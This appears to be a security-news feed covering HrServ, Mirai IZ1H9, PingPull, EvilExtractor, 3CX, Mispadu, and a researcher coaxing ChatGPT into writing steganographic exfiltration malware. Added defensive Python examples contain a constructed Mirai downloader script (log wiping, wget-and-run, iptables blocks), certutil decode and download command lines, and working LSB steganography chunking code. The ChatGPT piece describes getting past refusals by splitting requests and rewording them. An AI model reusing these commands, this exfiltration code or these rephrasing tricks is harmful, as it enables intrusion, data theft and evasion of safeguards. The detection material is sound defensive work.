Information Security Newspaper | Infosec Articles | Hacking News (https://www.securitynewspaper.com/), feed last built Fri, 24 Nov 2023 00:00:42 +0000

How hrserver.dll stealthy webshell can mimic Google’s Web Traffic to hide and compromise networks
https://www.securitynewspaper.com/2023/11/23/how-hrserver-dll-stealthy-webshell-can-mimic-googles-web-traffic-to-hide-and-compromise-networks/
Fri, 24 Nov 2023 00:00:40 +0000

The post How hrserver.dll stealthy webshell can mimic Google’s Web Traffic to hide and compromise networks appeared first on Information Security Newspaper | Hacking News.

In a striking revelation shaking the cybersecurity world, researchers have unearthed a sophisticated web shell, dubbed ‘HrServ,’ hidden within a seemingly innocuous DLL file, ‘hrserv.dll.’ This discovery, emerging from routine cybersecurity investigations, uncovers a new depth in the sophistication of cyber attacks, challenging existing defense mechanisms.

The Alarming Emergence of Web Shells in Cyber Warfare

Web shells, a relatively obscure term outside cybersecurity circles, represent a formidable threat in the digital age. They are malicious scripts or programs that hackers deploy on compromised web servers, enabling remote access and control. The discovery of HrServ marks a significant escalation in this digital arms race. Typically, web shells are rudimentary in nature, but HrServ breaks this mold with its advanced capabilities and stealthy operations, setting a new benchmark for cyber threats.

Stumbling Upon ‘HrServ’

The discovery of HrServ began with routine analysis of suspicious files. At first, ‘hrserv.dll’ did not appear to deviate from the norm, but closer inspection revealed its true nature: a web shell with custom encoding for its client communications and the ability to execute attacker-supplied code directly in memory, a tactic that leaves little on disk and significantly complicates detection.

Decoding HrServ’s Sophisticated Mechanics

HrServ’s infection chain starts with the creation of a scheduled task named ‘MicrosoftsUpdate’, which executes a batch file. That batch file copies ‘hrserv.dll’ into the System32 directory, embedding the malware deep within the system. From there, HrServ starts an HTTP server and handles client-server communication with a custom encoding scheme that involves Base64 and the FNV1A64 hash algorithm.

The Ingenious GET Parameter Technique

One of the most striking aspects of HrServ is how it dispatches on a single query parameter, ‘cp’, in the HTTP requests it receives. The value of ‘cp’, combined with the request method (GET or POST), selects which function the web shell runs. For example:

  • GET with cp=0: Calls VirtualAlloc, copies a custom decoded NID cookie value, and creates a new thread.
  • POST with cp=1: Creates a file and writes the custom decoded POST data to it.
  • GET with cp=2: Reads a file using the custom decoded NID cookie value and returns it in the response.
  • GET with cp=4 and 7: Returns Outlook Web App HTML data.
  • POST with cp=6: Indicates a code execution process, copying decoded POST data to memory and creating a new thread.

This lets the malware perform a range of actions depending on the request it receives, making it a versatile and dangerous tool for attackers. The parameter and cookie names it relies on also resemble those seen on Google services (NID, in particular, is a well-known Google cookie name), which helps the malicious traffic blend in with legitimate web traffic and makes detection more challenging.
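As an added example (it is not code from the original article or from the researchers who analysed HrServ), the following Python snippet turns the dispatch table above into a detection check that can be run over raw HTTP requests pulled from a proxy or IDS. The request samples, host names, paths and cookie values are constructed for illustration; the mapping of (method, cp) to action is taken from the list above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# (method, cp value) -> action, reproduced from the behaviour list above.
HRSERV_ACTIONS = {
    ("GET", "0"): "VirtualAlloc, copy decoded NID cookie value, start new thread",
    ("POST", "1"): "create a file and write the decoded POST body to it",
    ("GET", "2"): "read the file named by the decoded NID cookie value",
    ("GET", "4"): "return Outlook Web App HTML (decoy)",
    ("GET", "7"): "return Outlook Web App HTML (decoy)",
    ("POST", "6"): "copy decoded POST body to memory and execute it",
}

# Google's own services legitimately use a cookie called NID; the web shell
# runs on the victim's server, so the same names on any other host are suspect.
GOOGLE_HOST = re.compile(r"(^|\.)(google|gstatic|googleapis)\.com$", re.I)
OPAQUE_BLOB = re.compile(r"^[A-Za-z0-9+/=_-]{16,}$")  # base64-like argument

def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, query, host and cookies."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    url = urlsplit(target)
    return {"method": method, "path": url.path, "query": parse_qs(url.query),
            "host": headers.get("host", ""), "cookies": cookies}

def classify(raw: str):
    """Return a finding dict if the request matches HrServ's cp dispatch, else None."""
    req = parse_request(raw)
    cp = req["query"].get("cp", [None])[0]
    action = HRSERV_ACTIONS.get((req["method"], cp))
    if action is None or GOOGLE_HOST.search(req["host"]):
        return None  # unknown cp value, or genuine Google traffic
    reasons = [f"{req['method']} with cp={cp} maps to: {action}"]
    nid = req["cookies"].get("NID")
    if nid is not None:
        reasons.append(f"Google-style NID cookie sent to non-Google host {req['host']!r}")
        if OPAQUE_BLOB.match(nid) and (req["method"], cp) in {("GET", "0"), ("GET", "2")}:
            reasons.append("NID carries an opaque blob where the shell expects an encoded argument")
    return {"method": req["method"], "cp": cp, "host": req["host"],
            "path": req["path"], "reasons": reasons}

def scan(requests):
    """Run classify() over a list of raw requests and keep the hits."""
    return [hit for hit in map(classify, requests) if hit]

# Constructed request samples (hosts, paths and cookie values are made up).
SAMPLES = [
    "GET /owa/auth.aspx?cp=2 HTTP/1.1\r\nHost: mail.example-gov.test\r\n"
    "Cookie: NID=QUFBQUJCQkJDQ0NDRERERA\r\n\r\n",
    "POST /owa/auth.aspx?cp=6 HTTP/1.1\r\nHost: mail.example-gov.test\r\n"
    "Content-Length: 12\r\n\r\nZGVhZGJlZWY=",
    "GET /search?q=hrserv&cp=2 HTTP/1.1\r\nHost: www.google.com\r\n"
    "Cookie: NID=511=abcdefghijklmnopqrstuvwxyz\r\n\r\n",
    "GET /owa/auth.aspx?cp=4 HTTP/1.1\r\nHost: mail.example-gov.test\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: mail.example-gov.test\r\n\r\n",
]

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print(hit["method"], hit["path"], "cp=" + hit["cp"], "->", "; ".join(hit["reasons"]))
```

The Host header is attacker-controlled, so in production the "genuine Google traffic" exception should key on the destination IP or TLS SNI seen by the sensor rather than on the header. Because cp=4 and cp=7 return Outlook Web App HTML as a decoy, the matching path on the victim server will often look like a legitimate Exchange endpoint, which is why the check keys on the parameter and cookie rather than the path.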

Mimicking Google’s Web Traffic Patterns

In a cunning move to evade detection, HrServ’s communication pattern is modeled to mimic Google’s web services. This resemblance is not accidental but a deliberate attempt to blend malicious traffic with legitimate web services, making it a needle in a digital haystack for network monitoring systems.

The Afghan Government Entity: A Sole Victim with Global Implications

Remarkably, the only known victim of HrServ, as per the available data, was a government entity in Afghanistan. This targeted approach hints at the possibility of state-sponsored cyber espionage, although the attribution remains unclear. The implications of such a sophisticated attack extend far beyond a single entity, posing a stark reminder of the vulnerabilities inherent in digital infrastructures worldwide.

Unraveling the Mystery: Who is Behind HrServ?

The origins and affiliations of the HrServ creators remain shrouded in mystery. However, certain clues point towards a non-native English-speaking group, deduced from language patterns and technical intricacies observed in the malware. Moreover, the use of specific parameters akin to those in Google services suggests a high level of sophistication and understanding of global web traffic patterns.

Looking Ahead: A Cybersecurity Challenge for the Future

The discovery of HrServ represents a watershed moment in the ongoing battle between cybercriminals and defenders. Its sophisticated design, evasive techniques, and targeted application signify a new era in cyber threats, one where traditional defense mechanisms may no longer suffice. As cybersecurity experts continue to dissect and understand HrServ, the digital world braces for future challenges, emphasizing the ever-evolving nature of cyber threats and the perpetual need for innovative defense strategies.

Mirai Botnet is back with a new version IZ1H9
https://www.securitynewspaper.com/2023/05/26/mirai-botnet-is-back-with-a-new-version-iz1h9/
Fri, 26 May 2023 15:31:00 +0000

Researchers from Unit 42 discovered a Mirai variant known as IZ1H9 that exploits multiple vulnerabilities in order to spread. The threat actors exploit the following vulnerabilities to attack unprotected Linux-based servers and networking devices:

CVE-2023-27076: Tenda G103 command injection vulnerability
CVE-2023-26801: LB-Link command injection vulnerability
CVE-2023-26802: DCN DCBI-Netlog-LAB remote code execution vulnerability
Zyxel remote code execution vulnerability

Compromised devices can be fully controlled by the attackers and join the botnet, where they can be used in further attacks such as distributed denial-of-service (DDoS). IZ1H9 is a significant risk because it exploits multiple vulnerabilities and takes complete control of affected devices, which then become members of its botnet. Since November 2021, the IZ1H9 variant has been tied to a number of campaigns that are most likely the work of a single threat actor, judging by key indicators such as similar shell script downloaders, identical XOR decryption keys, and identical function usage.

On April 10, 2023, researchers observed unusual traffic pointing to a shell script downloader named ‘lb.sh’ hosted at a particular IP address. When executed successfully, the downloader first clears logs to hide its activity, then downloads bot clients built for a range of Linux architectures. Finally, it modifies the device’s iptables rules to block network connections on many ports, which makes it harder for victims to recover remote devices.

Further research turned up two other URLs hosting shell script downloaders. These fetched botnet clients that communicated with a command and control (C2) server, along with further URLs hosting shell scripts. The downloaders were observed retrieving botnet clients from a fixed set of locations and contacting several C2 domains.
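As an added example that is not part of the Unit 42 research or this article, here is a small Python triage routine that scores a shell script for the three downloader behaviours described above: wiping logs, fetching bot binaries for several Linux architectures, and adding iptables rules that drop inbound ports. The sample script, the IP address, the file names and the benign comparison script are constructed for illustration and are not the real lb.sh.

```python
import re

# Constructed stand-in for the downloader described above (not the real lb.sh).
# The IP address, file names and architecture list are made up for illustration.
SAMPLE_SCRIPT = """#!/bin/sh
rm -rf /var/log/wtmp /var/log/lastlog /var/log/messages
history -c
cd /tmp || cd /var/run
for a in mips mipsel arm arm5 arm6 arm7 x86 x86_64 sh4; do
  wget http://203.0.113.10/bins/bot.$a -O bot.$a || curl -s http://203.0.113.10/bins/bot.$a -o bot.$a
  chmod +x bot.$a
  ./bot.$a
done
iptables -A INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 2323 -j DROP
iptables -A INPUT -p tcp --dport 7547 -j DROP
iptables -A INPUT -p tcp --dport 80 -j DROP
rm -f bot.*
"""

# Constructed benign script: downloads something, but none of the three behaviours.
BENIGN_SCRIPT = """#!/bin/sh
apt-get update
wget https://repo.example.test/tool.deb -O /tmp/tool.deb
dpkg -i /tmp/tool.deb
"""

ARCH_NAMES = ("mips", "mipsel", "arm", "arm5", "arm6", "arm7", "x86", "x86_64",
              "i586", "i686", "sh4", "ppc", "m68k", "sparc", "aarch64")
LOG_WIPE = re.compile(r"(\brm\b[^\n]*?/var/log/|\bhistory\s+-c\b|>\s*/var/log/|\b(?:truncate|shred)\b[^\n]*?/var/log/)")
FETCH = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
IPT_DROP = re.compile(r"\biptables\b[^\n]*?--dport\s+(\d+)[^\n]*?-j\s+DROP\b")

def triage(script: str) -> dict:
    """Score a shell script for the three IZ1H9 downloader behaviours."""
    lines = script.splitlines()
    wipe_lines = [l for l in lines if LOG_WIPE.search(l)]
    has_fetch = any(FETCH.search(l) for l in lines)
    archs = sorted(a for a in ARCH_NAMES if re.search(rf"\b{re.escape(a)}\b", script))
    ports = [int(p) for l in lines for p in IPT_DROP.findall(l)]
    score = 0
    if wipe_lines:
        score += 1  # clears logs to hide what it did
    if has_fetch and len(archs) >= 3:
        score += 1  # fetches bot clients for many Linux architectures
    if len(ports) >= 2:
        score += 1  # walls off ports so the owner cannot get back in remotely
    return {"log_wipe_lines": wipe_lines, "archs": archs, "blocked_ports": ports,
            "score": score, "verdict": "mirai-style downloader" if score >= 2 else "no match"}

if __name__ == "__main__":
    for name, s in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        r = triage(s)
        print(name, r["verdict"], r["score"], r["archs"], r["blocked_ports"])
```

The three indicators are deliberately independent: a legitimate firmware updater may fetch several architecture-specific builds, and an admin script may tighten iptables, but a script that does both and also wipes /var/log is worth a closer look. The returned dict keeps the matching lines so an analyst can see what fired rather than just a score.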

Analysis of the downloaded samples showed that they belong to the Mirai variant known as IZ1H9. Since its first discovery in August 2018, IZ1H9 has attracted a lot of attention and remains one of the most active Mirai variants. Like the original Mirai, IZ1H9 refuses to run against certain IP ranges, kills competing botnet processes, and connects to a hardcoded C2 address, among many other similarities between the two.

Remote code execution attacks remain the most prevalent and most worrying threats to Linux servers and IoT devices. IoT devices have long been a profitable target for threat actors, and vulnerable devices left exposed can create serious risk.

Even though the vulnerabilities exploited by this threat are not especially difficult to exploit, their impact is not diminished, since they still lead to remote code execution. Once an attacker controls a vulnerable device, they can add it, and any others they have compromised, to their botnet and use them for further attacks such as distributed denial of service.

Applying vendor patches and firmware updates as soon as they become available is strongly recommended as protection against this threat.

Traffic to South African military websites from Linux server? Infection symptom of PingPull malware
https://www.securitynewspaper.com/2023/04/26/traffic-to-south-african-military-websites-from-linux-server-infection-symptom-of-pingpull-malware/
Wed, 26 Apr 2023 23:44:33 +0000

PingPull is malware used by the Chinese advanced persistent threat (APT) group Alloy Taurus, and researchers from Unit 42 have found a new variant that targets Linux systems. The group, also tracked as GALLIUM or Softcell, is known for cyberespionage operations against telecommunications companies, financial institutions, and government bodies in Asia, Europe, and Africa. Alongside the PingPull variant, the researchers found a backdoor named Sword2033 tied to the same command and control (C2) infrastructure. The first known PingPull samples date to September 2021; Unit 42 published research in June 2022 describing how PingPull operates and attributing the tool to Alloy Taurus, based on tracking its use across several campaigns. When the new sample was examined, only three of 62 antivirus vendors rated it malicious. Despite that mostly benign verdict, further analysis showed the sample is in fact a Linux variant of PingPull, a conclusion reached because its HTTP communication structure, POST parameters, AES key, and C2 commands match the known version.

The newly found Linux variant of PingPull uses a statically linked OpenSSL library and communicates with its C2 domain over port 8443. It uses the same AES key as the original Windows PE version of PingPull and shares some characteristics with the web shell known as China Chopper. The Sword2033 backdoor supports three functions: upload a file to the system, retrieve a file from the system, and execute a command. Investigation of the C2 domain uncovered links to Alloy Taurus activity, including evidence that the domain impersonated the South African military. The impersonation is particularly notable because it took place in February 2023, when South Africa took part in joint naval drills with Russia and China.

In addition, the researchers found persistent connections between the Sword2033 C2 server and an IP address hosting subdomains of an organization that finances long-term urban infrastructure development projects in Nepal. The finding underlines the continuing danger posed by Alloy Taurus and the need for businesses and other organizations to stay vigilant in their security operations.

Alloy Taurus continues to pose a serious risk to government, financial, and telecommunications institutions across Southeast Asia, Europe, and Africa. The discovery of a Linux edition of PingPull, together with the recent use of the Sword2033 backdoor, suggests the group keeps developing its tooling to support its espionage efforts. Unit 42 urges organizations to use its findings to guide the defensive measures they put in place against this threat group.

New famous all in one malware and hacking tool among cyber criminals: EvilExtractor
https://www.securitynewspaper.com/2023/04/24/new-famous-all-in-one-malware-and-hacking-tool-among-cyber-criminals-evilextractor/
Tue, 25 Apr 2023 00:23:25 +0000

EvilExtractor (sometimes written Evil Extractor) is an attack tool aimed at Windows systems that extracts data and files from endpoint devices. It ships with a number of modules, all of which operate over an FTP service. It is sold by a developer known as Kodex, who describes it as an educational tool; research by FortiGuard Labs, however, shows that criminals are actively using it as an information stealer.

Traffic-source data for the site evilextractor[.]com shows a considerable uptick in malicious activity in March 2023. On March 30, researchers found the malware in a phishing email campaign and were able to link it back to samples of the tool. It typically arrives disguised as a legitimate file, such as an Adobe PDF or a Dropbox document, but once opened it launches PowerShell to carry out its malicious operations. It also includes environment-checking and virtual-machine-detection features. Its main purpose appears to be harvesting browser data and other information from compromised endpoints, which it then sends to an attacker-controlled FTP server.

Researchers saw an increase in attacks distributing the malware during March 2023, with most infections recorded in the United States and Europe.

Kodex advertises and sells the tool on cybercrime forums. It was first released in October 2022, and its developer keeps expanding it with new modules that add advanced capabilities.

The malware can steal sensitive data from the infected endpoint, including browser history, passwords, and cookies. It can also log keystrokes, activate the camera, and take screenshots. The researchers found that it also carries a ransomware function known as “Kodex Ransomware.”

The analysts found a phishing campaign with a malicious PDF attachment disguised as a request to confirm an existing account. The attacker gets the victim to open the attachment by tricking them into clicking on the PDF icon.

EvilExtractor is being used as a full-featured information stealer with many malicious capabilities, including ransomware. Its PowerShell script can evade detection when run through a .NET loader or PyArmor. In a relatively short time, its developer has improved its reliability and updated a number of its functions. FortiGuard’s report shows how threat actors start an attack with a phishing email, identifies the files used to extract the EvilExtractor PowerShell script, and walks through the available functions, the kinds of information EvilExtractor gathers, and how the Kodex Ransomware operates. Users should be aware of this new information stealer and remain extremely cautious with suspicious emails.

How to create undetectable malware via ChatGPT in 7 easy steps bypassing its restrictions
https://www.securitynewspaper.com/2023/04/04/how-to-create-undetectable-malware-via-chatgpt-in-7-easy-steps-bypassing-its-restrictions/
Wed, 05 Apr 2023 01:38:42 +0000

There is evidence that ChatGPT has helped low-skill hackers generate malware, raising concerns about the technology being abused by cybercriminals. Security researchers say ChatGPT cannot yet replace expert threat actors, but it can help low-skill hackers create malware.

Since its launch in November, OpenAI’s chatbot has served over 100 million users, around 13 million per day, generating text, music, poetry, stories, and plays on request. It can also answer exam questions and write software code.

It appears that malicious intent follows powerful technology, particularly when that technology is available to the general public. There is evidence on the dark web that people have used ChatGPT to develop malicious material despite the anti-abuse restrictions meant to block illegitimate requests, something experts had feared would happen. Against this background, a researcher at Forcepoint set out to build malware without writing any code himself, relying only on advanced techniques such as steganography that were previously the preserve of nation-state adversaries.

The exercise had two overarching goals:

  1. To show how easy it is to get around the inadequate guardrails ChatGPT has in place.
  2. To show how easy it is to create sophisticated malware without writing any code, relying solely on ChatGPT.

Initially, ChatGPT told the researcher that creating malware is unethical and refused to provide code.

  1. To get around this, he asked for small pieces of code and assembled the executable by hand. The first successful request was code that looks for a local PNG larger than 5 MB; the design choice was that a 5 MB PNG can readily hold a chunk of a business-sensitive PDF or DOCX.

  2. He then asked ChatGPT to add code that hides the located files inside the PNG using steganography and exfiltrates them: it searches the user’s Documents, Desktop, and AppData directories and uploads the results to Google Drive.

  3. Next he asked ChatGPT to combine these pieces of code and modify them to split files into many “chunks” for quiet exfiltration via steganography.

  4. He submitted this MVP to VirusTotal, where five of sixty-nine vendors flagged the file as malicious.

  5. The next step was to ask ChatGPT to write its own LSB steganography routine without using an external library, and to delay the effective start of execution by two minutes.

  6. He then asked ChatGPT to obfuscate the code, which it refused. Rephrasing the request from “obfuscate the code” to “convert all variables to random English first and last names”, ChatGPT cheerfully cooperated. As a further test, he disguised the obfuscation request as protecting the code’s intellectual property; again it supplied sample code that obscured variable names and recommended Go modules for building fully obfuscated code.

  7. Finally, he uploaded the file to VirusTotal again to check the result.

The outcome, in the researcher’s words, was a “zero day”: a fairly sophisticated attack built in a matter of hours by following ChatGPT’s suggestions, with no code written by hand. Forcepoint estimated that a team of five to ten malware developers would need a few weeks to do the same without an AI-based chatbot, particularly if they wanted to evade every detection-based vendor.
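As an added example (not the Forcepoint researcher’s code, and not produced by ChatGPT), the Python below implements the core of steps 3 and 5 above, chunking a file and hiding each chunk in the least significant bits of a cover image without any external library, and pairs it with the check a defender would want: the pairs-of-values chi-square test, which flags an LSB plane that has been “flattened” by embedded data. The cover image and the “document” are constructed in code (a synthetic grayscale gradient and a pseudo-random blob standing in for a compressed or encrypted file); no real PNG files or cloud upload are involved.

```python
import hashlib
import struct

W, H = 64, 64  # constructed 8-bit grayscale cover: one byte per pixel, row-major

def make_cover() -> bytearray:
    """Constructed cover: a gamma-curve gradient along x, identical in every row.
    Like any smooth quantised ramp it only uses a subset of the 256 grey levels,
    which is what the pairs-of-values test below keys on."""
    row = [int(255 * (x / (W - 1)) ** 2.2) for x in range(W)]
    return bytearray(row * H)

def capacity(pixels) -> int:
    """Bytes that fit at one bit per pixel, minus a 4-byte length header."""
    return len(pixels) // 8 - 4

def lsb_embed(pixels, data: bytes) -> bytearray:
    """Write len(data) as a big-endian u32, then data, into the pixel LSBs."""
    if len(data) > capacity(pixels):
        raise ValueError("payload exceeds cover capacity")
    out = bytearray(pixels)
    i = 0
    for byte in struct.pack(">I", len(data)) + data:
        for shift in range(7, -1, -1):
            out[i] = (out[i] & 0xFE) | ((byte >> shift) & 1)
            i += 1
    return out

def lsb_extract(pixels) -> bytes:
    """Inverse of lsb_embed: read the length header, then that many bytes."""
    def read(byte_offset: int, n: int) -> bytes:
        buf = bytearray()
        for b in range(byte_offset, byte_offset + n):
            value = 0
            for bit in range(8):
                value = (value << 1) | (pixels[b * 8 + bit] & 1)
            buf.append(value)
        return bytes(buf)
    (length,) = struct.unpack(">I", read(0, 4))
    return read(4, length)

def split_chunks(data: bytes, size: int):
    return [data[i:i + size] for i in range(0, len(data), size)]

def exfil_roundtrip(document: bytes):
    """Chunk a document across as many covers as needed, then reassemble it."""
    per_image = capacity(make_cover())
    stego_images = [lsb_embed(make_cover(), chunk) for chunk in split_chunks(document, per_image)]
    recovered = b"".join(lsb_extract(img) for img in stego_images)
    return stego_images, recovered

def pov_chi_square(pixels) -> float:
    """Pairs-of-values test. Embedding near-uniform bits in the LSBs moves pixels
    only within the pair (2k, 2k+1), so the two counts become nearly equal and the
    statistic collapses. A clean cover keeps its uneven pairs and scores high."""
    hist = [0] * 256
    for v in pixels:
        hist[v] += 1
    chi = 0.0
    for k in range(128):
        a, b = hist[2 * k], hist[2 * k + 1]
        if a + b == 0:
            continue
        expected = (a + b) / 2
        chi += (a - expected) ** 2 / expected + (b - expected) ** 2 / expected
    return chi

def constructed_document(n: int) -> bytes:
    """Stand-in for a compressed or encrypted office file: near-uniform bytes
    derived from a fixed seed (constructed, not a real document)."""
    out, block = bytearray(), b"constructed-document"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])

if __name__ == "__main__":
    doc = constructed_document(1500)
    images, back = exfil_roundtrip(doc)
    print("chunks:", len(images), "roundtrip ok:", back == doc)
    print("chi clean cover: %.0f   chi stego image: %.0f"
          % (pov_chi_square(make_cover()), pov_chi_square(images[0])))
```

Two points for the defender follow from running this. First, “undetectable” in the article refers to antivirus signature scanning of the executable, not to the carrier images: a full-capacity LSB embed of compressed or encrypted data is exactly what the pairs-of-values statistic is designed to catch. Second, the test is only strong when the cover’s histogram is uneven and the payload fills most of the LSB plane; low embedding rates or pre-noisy covers weaken it, which is why DLP controls on outbound image uploads should not rely on stego detection alone.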

600,000 companies networks using 3CX VoIP software infected with malware. Biggest supply chain attack
https://www.securitynewspaper.com/2023/03/30/600000-companies-networks-using-3cx-voip-software-infected-with-malware-biggest-supply-chain-attack/
Thu, 30 Mar 2023 23:59:47 +0000

Researchers from multiple security companies report that a massive supply chain attack on users of 3CX, a widely used voice and video calling desktop client, was carried out by hackers working on behalf of the North Korean government. The attack targeted Windows and macOS users. With the 3CXDesktopApp, available for Windows, macOS, Linux, and mobile devices, 3CX users can make calls, check colleagues’ status, chat, schedule video conferences, and check voicemail from a single desktop program.

The attackers compromised the software build system used to generate and distribute the Windows and macOS versions of the app, which delivers VoIP and PBX services to “over 600,000 customers,” including American Express, Mercedes-Benz, and PricewaterhouseCoopers. Because they controlled the build system, the attackers could insert malware into 3CX applications that were then digitally signed with the company’s official signing key. A valid code signature therefore gave no warning: it attests only that the file came out of the vendor’s signing process, not that the pipeline feeding it was clean.

This is a traditional kind of attack on supply chains, and its purpose is to take advantage of the trust connections that exist between an organization and third parties.

According to the cybersecurity company CrowdStrike, the infrastructure and encryption key used in the attack are identical to those seen in a campaign carried out by Labyrinth Chollima on March 7. Labyrinth Chollima is the tracking name for a threat actor that is aligned with the North Korean government.

The attack first came to light late on Wednesday night, when products from several security vendors began flagging malicious activity originating from properly signed 3CX desktop application binaries. By February 2022 the threat actor had already registered a large set of domains used to communicate with infected devices, in preparation for the complex operation that followed. Around March 22, SentinelOne saw a spike in behavioral detections of the 3CXDesktopApp, and on the same day 3CX customers began discussing online what they assumed were false-positive detections by their endpoint security products.

According to 3CX Chief Information Security Officer Pierre Jourdan, Electron Mac App versions 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 contain a “security issue.” He said the payloads were inserted into bundled libraries built via Git, the version control system developers use to track changes in their code, and that many of the attacker-controlled servers that compromised workstations try to reach have already been taken down.

Since the 2020 attack on SolarWinds, which resulted in data breaches at businesses and governmental organizations all across the globe, software vendors have been on high alert for supply-chain invasions.

Mispadu Banking Trojan Is Stealing Millions From Victims In Chile, Mexico, Peru And Portugal
https://www.securitynewspaper.com/2023/03/22/mispadu-banking-trojan-is-stealing-millions-from-victims-in-chile-mexico-peru-and-portugal/
Wed, 22 Mar 2023 22:22:31 +0000

In the course of the investigation, researchers found twenty distinct spam campaigns directed at Chile, Mexico, Peru, and Portugal. Their primary goal was credential theft, specifically targeting online banking, schools, government agencies, social networks, gaming, e-commerce, public repositories, and Outlook email accounts. In some incidents the criminals built fake web pages for the victim, such as online banking login windows. The attackers first tried to infect victims by tricking them into opening a variety of fake invoices delivered as HTML pages or password-protected PDF files.

The number of government websites victims were logged into when their credentials were stolen, by country:

Chile: 105
Mexico: 431
Peru: 265

The following is a list of online banking websites in Latin America that victims were using when their credentials were compromised and stolen:

These campaigns used tactics, techniques, and procedures (TTPs) similar to those of the banking trojan known as Mispadu.
ESET discovered Mispadu around 2019; it targets countries in South America via spam and malvertising. Because of the group’s malware-as-a-service model and its high level of activity in the region, it is vital to keep an eye on it. The gang has continually launched new kinds of operations, and these campaigns feature many layers of obfuscation as well as new techniques, which makes it challenging to protect systems adequately against the threat.

Compromising genuine websites and using them as Command & Control Servers for the purpose of furthering the propagation of malware is one of their primary techniques. They achieve this by scanning for websites using outdated versions of content management systems, like WordPress, and compromising those websites. From that point on, they leverage these websites to spread malware in a customized manner. For example, they may filter out countries that they do not wish to infect, drop different types of malware depending on the country that is being infected, and even deploy a one-of-a-kind malicious RAT (Remote Administration Tool) when they detect an interesting device, such as a computer belonging to an employee of a bank.

Throughout these campaigns, the gang skips a victim whose system language is any of the following:

Spanish (Spain)
English (United States)
Portuguese (Brazil)

Because the criminals have automated payload generation, they can quickly roll out new malware variants, scale their operations, and run many campaigns simultaneously.

Analysis of the malware makes clear that the gang has an in-depth knowledge of the major financial institutions and banks in the Latin American countries under attack. The Spanish terms used throughout the malware suggest that some of the developers are Latin American; more precisely, the slang in the code comments suggests some of them may be from Chile.

Researchers found numerous additional techniques built into this large campaign that let the criminals harvest hundreds of different credentials.

Its multi-stage infection chain breaks the malicious behaviour into separate components, which makes it harder to spot. The following figure illustrates this tactic:

To make detection harder, the cybercriminals embed the malware inside fake certificate files and then abuse certutil, a legitimate Windows tool, to decode and run the banking malware.
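To give defenders a concrete handle on the certutil trick above, here is a small detection routine written for this article; it is not the researchers' code and not part of the original post. It scans process-creation records for certutil invocations that decode a "certificate" into an executable under a user-writable path or fetch a file by URL, and weights the result by the parent process. The events, field names and paths are constructed; -decode, -decodehex, -encode, -urlcache and -verifyctl are real certutil switches.

```python
"""Flag abuse of certutil.exe in process-creation telemetry.

Added example for this article (not the researchers' code). The events below
are constructed and mimic a few fields of a Sysmon Event ID 1 / Windows 4688
process-creation record; the field names are this example's own choice.
"""
import re

# certutil switches that turn a "certificate" text file back into a binary
# (-decode, -decodehex) or fetch a file from a URL (-urlcache). All are
# legitimate; the surrounding context decides whether the event is suspicious.
DECODE_SWITCHES = {"-decode", "-decodehex", "-encode"}
DOWNLOAD_SWITCHES = {"-urlcache", "-verifyctl"}
# User-writable locations where a decoded payload usually lands.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads)\\", re.I)
EXEC_EXT = re.compile(r"\.(exe|dll|scr|bat|cmd|ps1|vbs|js)$", re.I)
SCRIPT_PARENTS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe")

# Constructed sample: one decode-and-run, one download, one benign verify,
# one unrelated process.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -decode C:\Users\maria\AppData\Local\Temp\cert.crt C:\Users\maria\AppData\Local\Temp\update.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -urlcache -split -f http://example.invalid/x.txt C:\Users\maria\AppData\Roaming\x.txt",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -verify C:\certs\corp-root.cer",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe notes.txt",
     "parent_image": r"C:\Windows\explorer.exe"},
]


def analyze_event(event):
    """Return the reasons one process-creation event is suspicious (empty if none)."""
    if not event["image"].lower().endswith("\\certutil.exe"):
        return []
    tokens = event["command_line"].split()
    switches = {t.lower() for t in tokens if t.startswith("-")}
    reasons = []
    if switches & DECODE_SWITCHES:
        reasons.append("decode/encode switch: certificate file converted to a binary")
    if switches & DOWNLOAD_SWITCHES:
        reasons.append("download switch: certutil used as a downloader")
    for t in tokens:
        if USER_WRITABLE.search(t) and EXEC_EXT.search(t):
            reasons.append(f"executable written to a user-writable path: {t}")
            break
    # Only escalate on the parent once something else already looks wrong;
    # administrators do run certutil from cmd.exe.
    if reasons and event["parent_image"].lower().endswith(SCRIPT_PARENTS):
        reasons.append(f"launched by a shell or script host: {event['parent_image']}")
    return reasons


def analyze(events):
    """Run analyze_event over a batch and keep only the hits."""
    hits = []
    for e in events:
        reasons = analyze_event(e)
        if reasons:
            hits.append({"command_line": e["command_line"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in analyze(SAMPLE_EVENTS):
        print(hit["command_line"])
        for r in hit["reasons"]:
            print("   -", r)
```

The rule deliberately stays quiet on a bare `certutil -verify` from Explorer and only escalates on the parent process once a decode or download switch is already present, which keeps administrator use of the tool out of the alert queue.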

Although the Mispadu campaigns compromised thousands of users, the infection rate among corporate users is still relatively low, because corporate users typically have both an antivirus and an EDR/XDR in place.

However, businesses need to operate on the assumption that, in the not-too-distant future, one of their employees will be compromised. They should therefore devise a plan that shortens the time it takes to detect and respond to security threats while improving the SOC's monitoring, detection, and response capabilities.

